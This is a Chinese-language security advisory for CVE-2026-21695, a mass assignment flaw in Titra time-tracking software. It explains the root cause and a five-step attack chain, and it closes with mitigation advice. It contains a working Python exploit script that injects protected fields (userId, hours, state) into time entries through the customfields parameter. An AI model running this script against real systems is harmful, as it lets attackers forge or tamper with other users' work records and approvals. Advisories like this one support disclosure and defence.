CVE-2026-21695 Titra时间追踪软件Mass Assignment批量赋值漏洞

漏洞信息

漏洞编号

CVE-2026-21695

漏洞类型

Mass Assignment批量赋值

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Titra

漏洞概述

Titra是一款开源项目时间追踪软件。在0.99.49及以下版本中，存在一处严重的Mass Assignment（批量赋值）安全漏洞。该漏洞存在于API接口中，攻击者可通过customfields参数向时间条目注入任意字段，从而绕过业务逻辑控制。由于系统在合并用户控制的输入时直接使用了JavaScript的展开运算符(...customfields)，且仅验证了customfields为Object类型，却未对其内部键名进行任何过滤和校验，导致攻击者可利用此漏洞覆盖受保护字段如userId、hours和state等。此漏洞需要认证用户权限方可利用，CVSS评分4.3，属于中等严重程度。虽然该漏洞不影响系统的机密性和可用性，但会对数据完整性造成一定影响，攻击者可借此篡改他人的时间记录或伪造工作时长，存在一定的安全风险。

技术细节

该漏洞的技术根源在于Titra应用在处理时间条目更新请求时，直接将用户通过customfields参数提交的JSON对象展开合并到数据库文档中。具体来说，代码使用了类似{...existingData, ...customfields}的方式进行对象合并。系统仅通过类型检查确认customfields为Object类型，但未对其内部包含的键进行白名单验证或黑名单过滤。攻击者可利用此特性注入任意键值对，包括系统内部使用的受保护字段。例如，攻击者可在customfields中包含userId字段来伪造其他用户的时间记录，或修改hours字段来虚报工作时长，或更改state字段来操纵时间条目的审批状态。由于该漏洞位于API层面，攻击者可通过构造特定的HTTP请求来触发，攻击过程相对简单且隐蔽。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标Titra实例版本，确认版本号≤0.99.49

STEP 2

步骤2

获取访问权限：攻击者注册账户或使用已有低权限账户登录系统

STEP 3

步骤3

构造恶意请求：攻击者构造包含customfields参数的HTTP请求，在customfields对象中注入受保护字段如userId、hours、state等

STEP 4

步骤4

发送利用载荷：攻击者向/api/time-entries/{id}端点发送PUT请求，触发JavaScript展开运算符将恶意字段合并到数据库文档

STEP 5

步骤5

验证攻击效果：攻击者通过查询接口确认受保护字段已被成功覆盖或篡改

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import json # CVE-2026-21695 Mass Assignment PoC for Titra # Target: Titra <= 0.99.49 BASE_URL = "http://target-host/api" def exploit_mass_assignment(target_url, username, password, target_entry_id): """ Exploit mass assignment vulnerability in Titra API This PoC demonstrates how an attacker can inject arbitrary fields into time entries via the customfields parameter. """ # Step 1: Login to get authentication token login_url = f"{target_url}/login" login_data = {"email": username, "password": password} response = requests.post(login_url, json=login_data) if response.status_code != 200: print(f"[-] Login failed") return None token = response.json().get("token") headers = {"Authorization": f"Bearer {token}"} # Step 2: Craft malicious request with mass assignment payload # Inject arbitrary fields including protected fields like userId, hours, state malicious_payload = { "customfields": { "userId": "attacker-controlled-user-id", # Overwrite protected field "hours": 999, # Manipulate hours "state": "approved", # Bypass approval workflow "description": "Malicious entry via mass assignment" } } # Step 3: Send request to update time entry update_url = f"{target_url}/time-entries/{target_entry_id}" response = requests.put(update_url, json=malicious_payload, headers=headers) if response.status_code == 200: print("[+] Mass assignment exploit successful!") print(f"[+] Time entry {target_entry_id} has been modified") return True else: print(f"[-] Exploit failed: {response.status_code}") return False # Usage example # exploit_mass_assignment(BASE_URL, "[email protected]", "password123", "entry-id-123")

影响范围

Titra <= 0.99.49

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在API网关或Web应用防火墙(WAF)层面对customfields参数进行过滤，限制可提交的键名；2) 禁用或限制低权限用户创建和修改时间条目的功能；3) 启用详细的审计日志，监控异常的字段修改行为；4) 实施API请求速率限制，防止自动化攻击。建议尽快升级到官方修复版本0.99.50以根本解决此安全问题。